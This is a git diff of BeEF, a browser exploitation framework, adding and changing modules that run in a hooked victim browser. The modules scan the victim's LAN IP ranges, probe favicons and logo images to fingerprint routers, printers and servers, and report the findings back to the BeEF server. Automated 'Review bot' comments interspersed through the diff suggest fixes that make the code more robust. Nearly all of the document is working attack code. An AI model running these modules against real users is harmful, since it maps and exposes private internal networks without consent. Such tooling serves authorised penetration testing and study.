- var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
- if (range == null || range[1] == null) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
- return;
- }
-
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (var i = lowerBound; i <= upperBound; i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
+ // set target IP addresses
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (var i = lowerBound; i <= upperBound; i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
WorkerQueue = function(frequency) {
diff --git a/modules/network/cross_origin_scanner/config.yaml b/modules/network/cross_origin_scanner/config.yaml
index 77202c349..204067d05 100644
--- a/modules/network/cross_origin_scanner/config.yaml
+++ b/modules/network/cross_origin_scanner/config.yaml
@@ -9,11 +9,13 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
- description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
+ description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
+ # http://caniuse.com/cors
target:
working: ["ALL"]
not_working:
+ # CORS is partially supported on IE 8 & 9
IE:
min_ver: 6
max_ver: 7
@@ -22,7 +24,10 @@ beef:
max_ver: 11
C:
min_ver: 1
- max_ver: 2
+ max_ver: 3
S:
min_ver: 1
max_ver: 3
+ F:
+ min_ver: 1
+ max_ver: 3
diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb
index 0c3902bf0..4a080bc21 100644
--- a/modules/network/cross_origin_scanner/module.rb
+++ b/modules/network/cross_origin_scanner/module.rb
@@ -9,6 +9,25 @@ class Cross_origin_scanner < BeEF::Core::Command
content = {}
content['result'] = @datastore['result']
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # log the network service
+ if @datastore['results'] =~ /ip=(.+)&port=([\d]+)&status/
+ ip = $1
+ port = $2
+ print_debug("Hooked browser found HTTP server #{ip}:#{port}")
+ if !ip.nil? && !port.nil?
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid)
+ r.save
+ end
+ end
+ end
+
end
def self.options
diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js
new file mode 100644
index 000000000..c1e9eabfb
--- /dev/null
+++ b/modules/network/get_http_servers/command.js
@@ -0,0 +1,124 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var ips = new Array();
+ var proto = 'http';
+ var ipRange = "<%= @ipRange %>";
+ var port = "<%= @rport %>";
+ var timeout = "<%= @timeout %>";
+ var wait = "<%= @wait %>";
+ var threads = "<%= @threads %>";
+ var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
+
+ // set target IP addresses
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (i=lowerBound;i<=upperBound;i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
+ }
+
+ checkFavicon = function(proto, ip, port, uri) {
+ var img = new Image;
+ var dom = beef.dom.createInvisibleIframe();
+ beef.debug("[Favicon Scanner] Checking IP [" + ip + "] (" + proto + ")");
+ img.src = proto+"://"+ip+":"+port+uri;
+ img.onerror = function() { dom.removeChild(this); }
+ img.onload = function() {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+"&url="+escape(this.src));dom.removeChild(this);
+ beef.debug("[Favicon Scanner] Found HTTP Server [" + escape(this.src) + "]");
+ }
+ dom.appendChild(img);
+ // stop & remove iframe
+ setTimeout(function() {
+ if (dom.contentWindow.stop !== undefined) {
+ dom.contentWindow.stop();
+ } else if (dom.contentWindow.document.execCommand !== undefined) {
+ dom.contentWindow.document.execCommand("Stop", false);
+ }
+ document.body.removeChild(dom);
+ }, timeout*1000);
+ }
+
+ WorkerQueue = function(frequency) {
+
+ var stack = [];
+ var timer = null;
+ var frequency = frequency;
+ var start_scan = (new Date).getTime();
+
+ this.process = function() {
+ var item = stack.shift();
+ eval(item);
+ if (stack.length === 0) {
+ clearInterval(timer);
+ timer = null;
+ var interval = (new Date).getTime() - start_scan;
+ beef.debug("[Favicon Scanner] Worker queue is complete ["+interval+" ms]");
+ return;
+ }
+ }
+
+ this.queue = function(item) {
+ stack.push(item);
+ if (timer === null) {
+ timer = setInterval(this.process, frequency);
+ }
+ }
+
+ }
+
+ // create worker queue
+ var workers = new Array();
+ for (w=0; w < threads; w++) {
+ workers.push(new WorkerQueue(wait*1000));
+ }
+
+ // for each favicon path
+ for (var u=0; u < urls.length; u++) {
+ var worker = workers[u % threads];
+ // for each LAN IP address
+ for (var i=0; i < ips.length; i++) {
+ worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+port+'","'+urls[u]+'");');
+ }
+ }
+
+});
+
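Review bot: `WorkerQueue`'s `process` runs each queued item with `eval(item)`, and the items are source strings built by concatenating `proto`, `ips[i]`, `port` and `urls[u]`, so a quote character in any template-filled value changes the code that gets evaluated. Queueing a function removes the string round-trip: `worker.queue((function(ip, uri){ return function(){ checkFavicon(proto, ip, port, uri); }; })(ips[i], urls[u]));` with `item();` in place of `eval(item);`. The range loop also starts `i` as the string from `split('.')`, so its first `i <= upperBound` test is a string comparison; wrapping both bounds in `parseInt(..., 10)` makes it numeric.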
diff --git a/modules/network/get_http_servers/config.yaml b/modules/network/get_http_servers/config.yaml
new file mode 100644
index 000000000..7ef33d540
--- /dev/null
+++ b/modules/network/get_http_servers/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_http_servers:
+ enable: true
+ category: "Network"
+ name: "Get HTTP Servers (Favicon)"
+ description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
+ authors: ["bcoles"]
+ target:
+ user_notify: ["FF", "IE", "C", "S"]
diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb
new file mode 100644
index 000000000..4afcd1d01
--- /dev/null
+++ b/modules/network/get_http_servers/module.rb
@@ -0,0 +1,46 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Get_http_servers < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
+ {'name' => 'rport', 'ui_label' => 'Port', 'value' => '80'},
+ {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'},
+ {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '1'},
+ {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['url'] = @datastore['url'] if not @datastore['url'].nil?
+ if content.empty?
+ content['fail'] = 'No HTTP servers were discovered.'
+ end
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&url=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ url = $4
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server", :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
+ end
+end
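Review bot: The `results` string parsed in `post_execute` comes from the hooked browser, yet `proto` and `ip` are captured with greedy `(.+)` and written to `NetworkService` with no format check, so any text that fits between the `&` separators is stored as an address. Anchor with `\A` rather than `^` (which matches at every line start in Ruby) and constrain the fields, for example `/\Aproto=(https?)&ip=(\d{1,3}(?:\.\d{1,3}){3})&port=(\d+)&url=(.+)/`. The `if !ip.nil?` guard can never be false after a successful match, and `url` is assigned but never used. The same parsing appears in the hunk for `internal_network_fingerprinting/module.rb`, where the free-text `discovered` value also becomes `:type`, and `identify_lan_subnets/module.rb` pairs line anchors with the loose `[\d\.]+`.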
diff --git a/modules/network/identify_lan_subnets/command.js b/modules/network/identify_lan_subnets/command.js
new file mode 100644
index 000000000..a4347324d
--- /dev/null
+++ b/modules/network/identify_lan_subnets/command.js
@@ -0,0 +1,123 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ if(!beef.browser.isFF() && !beef.browser.isC()){
+ beef.debug("[command #<%= @command_id %>] Browser is not supported.");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
+ }
+
+ var min_timeout = 500;
+ var ranges = [
+ '192.168.0.0',
+ '192.168.1.0',
+ '192.168.2.0',
+ '192.168.10.0',
+ '192.168.100.0',
+ '192.168.123.0',
+ '10.0.0.0',
+ '10.0.1.0',
+ '10.1.1.0',
+ '10.10.10.0',
+ '172.16.0.0',
+ '172.16.1.0'
+ ];
+
+var doScan = function(timeout) {
+
+ var discovered_hosts = [];
+ var proto = "http";
+
+ var doRequest = function(host) {
+ var d = new Date;
+ var xhr = new XMLHttpRequest();
+ xhr.timeout = timeout;
+ xhr.onreadystatechange = function(){
+ if(xhr.readyState == 4){
+ var time = new Date().getTime() - d.getTime();
+ var aborted = false;
+ // if we call window.stop() the event triggered is 'abort'
+ // http://www.w3.org/TR/XMLHttpRequest/#event-handlers
+ xhr.onabort = function(){
+ aborted = true;
+ }
+ xhr.onloadend = function(){
+ if(time < timeout){
+ // 'abort' fires always before 'onloadend'
+ if(time > 1 && aborted === false){
+ beef.debug('Discovered host ['+host+'] in ['+time+'] ms');
+ discovered_hosts.push(host);
+ }
+ }
+ }
+ }
+ }
+ xhr.open("GET", proto + "://" + host, true);
+ xhr.send();
+ }
+
+ var requests = new Array();
+ for (var i = 0; i < ranges.length; i++) {
+ // the following returns like 192.168.0.
+ var c = ranges[i].split('.')[0]+'.'+
+ ranges[i].split('.')[1]+'.'+
+ ranges[i].split('.')[2]+'.';
+ // for every entry in the 'ranges' array, request
+ // the most common gateway IPs, like:
+ // 192.168.0.1, 192.168.0.100, 192.168.0.254
+ requests.push(c + '1');
+ requests.push(c + '100');
+ requests.push(c + '254');
+ }
+
+ // process queue
+ var count = requests.length;
+ beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");
+ var check_timeout = (timeout * count + parseInt(timeout,10));
+ var handle = setInterval(function() {
+ if (requests.length > 0) {
+ doRequest(requests.pop());
+ }
+ }, timeout);
+
+ // check for results
+ checkResults = function() {
+
+ if (handle) {
+ beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
+ clearInterval(handle);
+ handle = 0;
+ }
+
+ var hosts = discovered_hosts.join(",");
+ beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);
+ if (discovered_hosts.length >= 5) {
+ // if we get 5+ results something probably went wrong. this happens sometimes.
+ if (timeout > min_timeout) {
+ // if timeout is more than 500ms then decrease timeout by 500ms and try again
+ beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");
+ doScan(timeout-500);
+ } else {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts);
+ }
+ } else if (discovered_hosts.length == 0) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results");
+ } else {
+ beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+ }
+ }
+ setTimeout("checkResults();", check_timeout);
+
+}
+
+var timeout = "<%= @timeout %>";
+if (isNaN(timeout) || timeout < 1) timeout = min_timeout;
+doScan(parseInt(timeout,10));
+
+});
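Review bot: The unsupported-browser branch at the top sends `fail=unsupported browser` but does not return, so `doScan` still runs and a second result is reported for the same command; add `return;` after that `beef.net.send` call. `checkResults` is assigned without `var` and scheduled through the string form `setTimeout("checkResults();", check_timeout)`, which makes it a page-level global that a retry via `doScan(timeout-500)` overwrites. Declaring it as `var checkResults = function() {…}` and passing the reference, `setTimeout(checkResults, check_timeout);`, keeps it local to each scan and avoids evaluating a string.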
diff --git a/modules/network/identify_lan_subnets/config.yaml b/modules/network/identify_lan_subnets/config.yaml
new file mode 100644
index 000000000..859adabd1
--- /dev/null
+++ b/modules/network/identify_lan_subnets/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ identify_lan_subnets:
+ enable: true
+ category: "Network"
+ name: "Identify LAN Subnets"
+ description: "Discover active hosts in the internal network(s) of the hooked browser. This module works by attempting to connect to commonly used LAN IP addresses and timing the response."
+ authors: ["browserhacker.com"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE", "S", "O"]
diff --git a/modules/network/identify_lan_subnets/module.rb b/modules/network/identify_lan_subnets/module.rb
new file mode 100644
index 000000000..51aa7ca93
--- /dev/null
+++ b/modules/network/identify_lan_subnets/module.rb
@@ -0,0 +1,48 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+##
+# Ported to BeEF from: http://browserhacker.com/code/Ch10/index.html
+##
+
+class Identify_lan_subnets < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'timeout', 'ui_label' => 'Timeout for each request (ms)', 'value' => '500'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['host'] = @datastore['host'] if not @datastore['host'].nil?
+ content['hosts'] = @datastore['hosts'] if not @datastore['hosts'].nil?
+ if content.empty?
+ content['fail'] = 'No active hosts have been discovered.'
+ end
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # log the network hosts
+ if @datastore['results'] =~ /^hosts=([\d\.,]+)/
+ hosts = "#{$1}"
+ hosts.split(',').flatten.each do |ip|
+ next if ip.nil?
+ next unless ip.to_s =~ /^([\d\.]+)$/
+ print_debug("Hooked browser found host #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
+ end
+ end
+
+ end
+
+end
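Review bot: Several statements in the host loop of `post_execute` do nothing. `String#split` already returns a flat array of strings, so `.flatten` and `next if ip.nil?` are dead code, and `"#{$1}"` only copies the capture. `Regexp.last_match(1).split(',').each do |ip|` says the same thing more directly. The block also creates a new `NetworkHost` for every address on every run; whether the model rejects duplicates is not visible in this hunk, so a comment stating the intent would help, e.g. `# duplicates are filtered by the model (confirm)`.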
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 79565b7e3..0eff974dc 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
- // set target LAN IP addresses
- if (ipRange != null){
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (i=lowerBound;i<=upperBound;i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
- }
- } else {
+ // set target IP addresses
+ if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (i=lowerBound;i<=upperBound;i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
/* Signatures in the form of:
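Review bot: The range pattern is passed to `ipRange.match` as a quoted string, so the `\.` and `\-` escapes are consumed by the string literal and each separator dot becomes a regex `.` that matches any character. Use a regex literal (`ipRange.match(/^…$/)`) or double the backslashes. The pattern also does not require the two addresses to share their first three octets, and `lowerBound`/`upperBound` stay strings, so the first `i<=upperBound` test is a string comparison (`"2" <= "10"` is false). `lowerBound = parseInt(ipBounds[0].split('.')[3], 10);`, and the same for `upperBound`, avoids that. With the `ipRange != null` test removed in the previous hunk, a null `ipRange` would throw on `.match`; where `ipRange` is assigned is outside these hunks.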
@@ -106,6 +112,10 @@ beef.execute(function() {
"Billion Router",
"80","http",false,
"/customized/logo.gif",224,55),
+ new Array(
+ "Netgear N300 Router",
+ "80","http",false,
+ "/settings.gif",750,85),
new Array(
"Linksys NAS",
"80","http",false,
@@ -198,6 +208,14 @@ beef.execute(function() {
"HP Printer Photosmart series",
"80","http",false,
"/webApps/images/hp_d_rgb_m.gif",50,50),
+ new Array(
+ "Lexmark Printer",
+ "80","http",false,
+ "/images/lexlogo.gif",153,115),
+ new Array(
+ "Canon Printer",
+ "8000","http",false,
+ "/login/image/canonlogo.gif",100,37),
new Array(
"Zenoss",
"8080","http",false,
@@ -214,22 +232,40 @@ beef.execute(function() {
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56),
+ new Array(
+ "Apache Tomcat",
+ "8080","http",true,
+ "/docs/images/tomcat.gif",146,92),
new Array(
"Jenkins",
"80","http",false,
"/static/"+Math.random().toString(36).substring(2,10)+"/images/jenkins.png",240,323),
+ new Array(
+ "SAP NetWeaver",
+ "80","http",true,
+ "/logon/layout/shadow.jpg",18,4),
+ new Array(
+ "Netscape iPlanet",
+ "80","http",true,
+ "/mc-icons/menu.gif",21,18),
new Array(
"m0n0wall",
"80","http",false,
- "/logo.gif",150,47)
+ "/logo.gif",150,47),
+ new Array("SMC Router","80","http",false,"/images/logo.gif",133,59)
// Uncommon signatures
+//new Array("Citrix MetaFrame", "80", "http", false, "/Citrix/MetaFrameXP/default/media/nfusehead.gif",230,41),
+//new Array("Oracle E-Business Suite","80","http",false,"/OA_MEDIA/FNDSSCORP.gif",134,31),
+//new Array("OracleAS Reports Service","80","http",false,"/reports/images/oraclelogo_sizewithprodbrand.gif",133,20),
+//new Array("Oracle iLearning","80","http",false,"/ilearn/en/shared/img/coin_help_ready.gif",60,32),
+//new Array("RSA Self-Service Console", "80", "http",false,"/console-selfservice/images/default/icn_help.gif",14,14),
+//new Array("Sambar Server", "80", "http",false,"/sysimage/system/powerby.gif",41,23),
//new Array("BeEF","3000","http",false,"/ui/media/images/beef.png",200,149),
//new Array("BeEF (PHP)","80","http",false,"/beef/images/beef.gif",32,32),
//new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
//new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
//new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
-//new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
//new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
//new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
);
@@ -244,7 +280,7 @@ beef.execute(function() {
img.onerror = function() { dom.removeChild(this); }
img.onload = function() {
if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) {
- beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]");
}
}
diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml
index 77f6d75b4..34173741a 100644
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
- description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner."
+ description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index 971e02e83..cb928e86f 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -24,5 +24,25 @@ class Internal_network_fingerprinting < BeEF::Core::Command
content['fail'] = 'No devices/applications have been discovered.'
end
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&discovered=(.+)&url=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ discovered = $4
+ url = $5
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
end
end
diff --git a/modules/network/jslanscanner/command.js b/modules/network/jslanscanner/command.js
new file mode 100644
index 000000000..a20f5a529
--- /dev/null
+++ b/modules/network/jslanscanner/command.js
@@ -0,0 +1,410 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// Ported to BeEF from jslanscanner: https://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js
+
+beef.execute(function() {
+
+ if(!beef.browser.isFF() && !beef.browser.isS()){
+ beef.debug("[command #<%= @command_id %>] Browser is not supported.");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
+ }
+
+//------------------------------------------------------------------------------------------
+// LAN SCANNER created by Gareth Heyes (gareth at businessinfo co uk)
+// Blog: www.thespanner.co.uk
+// Labs site : www.businessinfo.co.uk
+// Version 2.1
+//------------------------------------------------------------------------------------------
+
+/* Copyright 2007 Gareth Heyes (email : gareth[at]NOSPAM businessinfo(dot)(co)(dot)uk
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
